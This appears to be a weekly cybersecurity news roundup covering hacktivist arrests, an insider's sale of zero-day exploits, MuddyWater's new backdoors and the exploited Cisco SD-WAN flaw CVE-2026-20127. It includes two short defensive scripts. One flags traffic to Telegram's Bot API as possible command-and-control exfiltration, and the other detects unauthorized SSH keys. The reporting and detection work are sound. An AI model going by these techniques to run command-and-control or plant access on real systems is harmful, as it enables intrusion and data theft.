The Good | Authorities Arrest Hacktivist & Convict L3Harris Insider for Selling Secrets to Russia

Spanish authorities have arrested four suspected members of “Anonymous Fénix”, a hacktivist group accused of launching distributed denial-of-service (DDoS) attacks against government ministries, political parties, and public institutions in Spain and parts of South America.

According to the Spanish Civil Guard, the group intensified its operations after the deadly Valencia floods in October 2024, blaming officials for the disaster. The suspects allegedly used X and Telegram to spread anti-government propaganda and recruit volunteers. Courts have since shut down the group’s social media accounts and messaging channels as part of a broader crackdown on cybercrime networks.

In the U.S., a former executive at defense contractor L3Harris Technologies has been sentenced to over seven years in prison for stealing classified zero-day exploits and selling them to a Russian cyber-weapons broker. Peter Williams, who led the firm’s Trenchant cybersecurity unit, admitted taking at least eight sensitive exploit components between 2022 and 2025, using an external drive and encrypted transfers. He sold the tools, developed exclusively for U.S. and allied intelligence agencies, for millions of dollars in cryptocurrency.

U.S. prosecutors said the theft caused tens of millions in losses and posed a severe national security risk. The broker, Operation Zero, allegedly resells exploits to Russian government and private clients. The Department of the Treasury simultaneously imposed sanctions on the company, its owner Sergey Sergeyevich Zelenyuk, and affiliated entities under a law targeting intellectual property theft by foreign adversaries.

Williams pleaded guilty in October 2025 and was ordered to forfeit cash, cryptocurrency, property, and luxury assets. Insider threats endangering national defense capabilities continue to rise and officials warn that trafficking in offensive cyber tools has become a lucrative global black market.

The Bad | ‘MuddyWater’ Actors Launch Operation Across the MENA Region with New Malware

MuddyWater (aka TEMP.Zagros, TA450, G0069), an Iranian state-linked threat actor, has initiated a new cyber campaign dubbed “Operation Olalampo”, which targets organizations and individuals across the Middle East and North Africa (MENA) amid ongoing regional tensions. First observed in January, the operation introduces novel malware variants while maintaining tactics consistent with the group’s past intrusions, according to new research.

The campaign relies heavily on phishing emails carrying malicious Microsoft Office attachments that trigger macro-based infections. Victims are tricked into enabling macros, which deploy the novel downloaders GhostFetch and HTTP_VIP. These tools profile compromised systems, evade legacy defenses, and deliver secondary payloads including the novel GhostBackDoor malware, an implant capable of remote command execution, file manipulation, and persistent access. In some cases, attackers deploy legitimate remote administration software to blend malicious activity with normal operations.

Malicious Microsoft Excel file before macros are enabled (Source: Group-IB)

A notable addition is CHAR, another novel Rust-based backdoor controlled through a Telegram bot for command-and-control (C2), enabling attackers to execute commands, exfiltrate data, and launch additional malware. Analysis indicates possible AI-assisted development, reflecting threat actors’ increasing experimentation with generative tools to accelerate malware creation. Researchers also noted infrastructure reuse from late 2025, suggesting sustained operations rather than isolated attacks.

Operation Olalampo points to MuddyWater’s focus on post-exploitation control, including reconnaissance, credential harvesting, and lateral movement. The group has also exploited vulnerabilities in public-facing servers to gain initial access. Security analysts warn that the campaign is a sign of broader plans to target network edge systems and critical sectors to establish long-term footholds, reinforcing concerns about nation-state-backed cyber operations expanding in scope and sophistication across the MENA region.

Defenders are urged to prioritize phishing resistance and monitor for unusual outbound communications to messaging platforms often used as C2 channels.
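One low-effort control for the Telegram C2 channel is to flag outbound requests to the Bot API from hosts that have no business talking to it. A minimal sketch, assuming a simple space-delimited proxy log format (timestamp, source host, destination host, bytes) and a hypothetical allowlist:

```python
# Sketch: flag outbound traffic to messaging-platform API endpoints from
# unexpected hosts. Log format and allowlist are assumptions for illustration.

C2_DOMAINS = {"api.telegram.org"}  # Telegram Bot API, as abused by CHAR's C2

def flag_messaging_c2(lines, allowlist=frozenset()):
    """Return (timestamp, src, dest) for flows to C2-capable messaging APIs."""
    alerts = []
    for line in lines:
        ts, src, dest, _bytes_out = line.split()
        if dest in C2_DOMAINS and src not in allowlist:
            alerts.append((ts, src, dest))
    return alerts

logs = [
    "2026-03-02T10:01Z web-01 cdn.example.com 5120",
    "2026-03-02T10:02Z fileserver-03 api.telegram.org 2048",  # unexpected source
]

for ts, src, dest in flag_messaging_c2(logs, allowlist={"chatops-bot"}):
    print(f"ALERT {ts}: {src} -> {dest}")
```

Since some organizations do run legitimate chat-ops bots, the allowlist matters; everything else talking to the Bot API deserves investigation.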

The Ugly | Attackers Exploit Critical Cisco SD-WAN Flaw to Target National Infrastructure

Cisco has disclosed an active zero-day exploitation of a critical authentication bypass in its Catalyst SD-WAN platform, a maximum-severity flaw that lets remote attackers compromise controllers and insert malicious peers into targeted networks. The flaw, tracked as CVE-2026-20127, affects both on-premises and cloud deployments of SD-WAN Controller, Manager, and Cloud products.

The vulnerability stems from a broken peering authentication mechanism that can be abused with crafted requests. Successful exploitation grants attackers high-privilege internal access, enabling manipulation of network configurations via NETCONF. By adding malicious peers that appear legitimate, adversaries can route traffic, advertise attacker-controlled networks, and pivot deeper into affected environments.

Cisco Talos attributes the campaign, tracked as UAT-8616, to a sophisticated threat actor active since at least 2023. Investigators believe attackers escalated privileges by downgrading to an older version of the software, exploiting an older root-level flaw (CVE-2022-20775), then restoring the original version to evade detection while retaining control. Talos also links the activity to a broader pattern of targeting network edge devices to gain footholds in high-value organizations, including critical national infrastructure (CNI) operators, suggesting possible nation-state backing.

Government agencies warn the threat is global and ongoing. So far, CISA has issued an emergency directive ordering federal agencies to inventory devices, collect forensic evidence, and patch immediately, while the UK’s National Cyber Security Centre urges organizations to report signs of compromise and follow hardening guidance to minimize risk.

Indicators of compromise include suspicious authentication logs, unauthorized SSH keys, rogue accounts, log tampering, and unexplained software downgrades. Authorities also stress that SD-WAN management interfaces should never be internet-exposed and recommend isolating control systems, forwarding logs externally, and applying updates.
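Of these indicators, unauthorized SSH keys are among the easiest to check mechanically: diff each device’s authorized_keys entries against a known-good baseline. A minimal sketch (the baseline format and key material below are invented for illustration):

```python
# Sketch: diff authorized_keys content against a known-good baseline to surface
# unauthorized SSH keys. Key material here is invented for illustration.

def parse_keys(text):
    """Return the set of (keytype, key) pairs, ignoring comments and options."""
    keys = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Find the key-type token; anything before it is key options.
        for i, tok in enumerate(parts):
            if tok.startswith("ssh-") or tok.startswith("ecdsa-"):
                if i + 1 < len(parts):
                    keys.add((tok, parts[i + 1]))
                break
    return keys

baseline = "ssh-ed25519 AAAAC3NzBASELINEKEY admin@jump\n"
current = (
    "ssh-ed25519 AAAAC3NzBASELINEKEY admin@jump\n"
    "ssh-rsa AAAAB3NzROGUEKEY root@unknown\n"   # not in the baseline
)

unauthorized = parse_keys(current) - parse_keys(baseline)
for keytype, key in sorted(unauthorized):
    print(f"ALERT: unauthorized key {keytype} {key[:16]}...")
```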
